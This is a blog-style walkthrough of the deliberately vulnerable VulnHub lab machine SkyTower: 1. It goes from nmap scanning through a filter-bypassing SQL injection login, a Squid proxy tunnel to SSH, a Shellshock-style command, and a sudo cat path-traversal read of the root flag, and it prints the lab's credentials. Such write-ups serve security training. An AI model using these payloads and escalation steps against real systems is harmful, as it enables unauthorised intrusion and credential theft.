Apr 26, 2021
VulnHub: SkyTower: 1
Initial foothold
- Network discovery
nmap -sn 10.0.2.27/24My target is 10.0.2.40.
2.Port scan
nmap -Pn 10.0.2.40nmap -Pn -p1000- 10.0.2.40
There’s 1 filtered port (22) and 2 open ports (80 and 3128).
3. OS and service scan
nmap -A -p22,80,3128 10.0.2.40
4. Vuln scan
nmap --script vuln -p22,80,3128 10.0.2.40There’s ‘login.php’ on the HTTP service.
Service Enumeration
There’re 3 services
- 22/tcp filtered ssh
- Connect
ssh 10.0.2.40When I tried to connect, it froze.
- 80/tcp open http Apache httpd 2.2.22 ((Debian))
- Nikto scan
2. Directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.40/ -x php,txt,html,sh,cgi,bak -q
3. Access HTTP site
View page source
4. SQL injection
Since It’s a login form. I will try SQL injection.
test@test.comtest
Intercept w/ Burp Suite
Send to the Repeater.
Starting w/ this input:
1' or 1=1--Use decoder to encode for URL
Copy to both email and password parameters. There’s am error mesasge
Take a closer look
There’re 2 problems that I’m facing:
- Filter
In my experience, error-based SQLi will show a message like this:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 In this case, it’s a weird error message, ‘11’.
Because of this, I suspect that there’s a filter in the code.
2. comment
I supplied ’--’ as acomment to suppress the password field, but the error message still shows that there’s some handling w/ the password field. I need to change it.
To bypass the filter problem, I changed ‘or’ to ‘||’
1' || 1=1--
Take a closer look at the error message, the filter problem should be gone for now.
1' || 1=1-- - -> failed1' || 1=1--+ -> failed1' || 1=1# -> succeeded
I got a credential, john : hereisjohn.
- 3128/tcp open http-proxy Squid http proxy 3.1.20
Access w/ browser. It’s a proxy service.
Exploitation
There’s only SSH service left and proxy service. I will try to use a proxy tunnel and access SSH via the created tunnel
- To create proxy tunnel, use this command:
proxytunnel -p <target ip>:<proxy port> -d 127.0.0.1:<target port> -a <our port>proxytunnel -p 10.0.2.40:3128 -d 127.0.0.1:22 -a 1234
2. Connect to SSH
ssh john@127.0.0.1 -p 1234I could connect, but the connection was cut immediately.
3. Working around SSH to get the shell
- SSH shellshock
ssh john@127.0.0.1 -p 1234 '() { :;}; /bin/bash'
- Just call /bin/bash
ssh john@127.0.0.1 -p 1234 /bin/bashid
4. TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'This machine doesn't have python.
Try for another one, echo.
which echoecho os.system('/bin/bash')
My connection was cut again. I’m tired of this, so I have to work around.
My first suspicion is ‘.bashrc’.
ls -laThere’s the ‘.bashrc’ file.
Edit it
nano .bashrcI cannot edit it.
Read it
cat .bashrcThere’s an ‘exit’ command in the file.
Just remove it
rm .bashrc
Login again. This time, I don't have to call /bin/bash.
ssh john@127.0.0.1 -p 1234I’m good to go.
Privilege Escalation
- Verify users
cat /etc/passwdThere’re 3 users on this machine: john, sara, and william.
2. Explore directories
I explored as listed
/opt/tmp/var/var/backups/var/log/var/mail/var/www/html
Finally, I found the ‘login.php’ in /var/www/html. Here are the commands
cd /var/www/htmlls -lacat login.php
I got MySQL credential
3. Verify sudo
sudo -lJohn cannot run sudo command.
4. Access mysql
Verify version
mysql -V
Login to mysql
mysql -uroot -proot
List database
use mysql;show databases;
There’s SkyTech.
Show tables in SkyTech
use SkyTech;show tables;
There’s login table.
Retrieve data
select * from loginI got the other 2 users’ credentials, sara and william.
5. Login as sara
su saraThe connection was cut immediately like john’s shell.
Remove .bashrc
ssh sara@127.0.0.1 -p 1234 /bin/bashrm .bashrc
Login again
ssh sara@127.0.0.1 -p 1234
6. sara’s sudo
Verify sudo
sudo -lThis user can use /bin/cat /account/*/
Verify path
ls -la /There’s /accounts directory.
Use wildcard to access /root
sudo /bin/cat /accounts/../root/flag.txt
Now I got root password
Login as root
su -password: theskytower
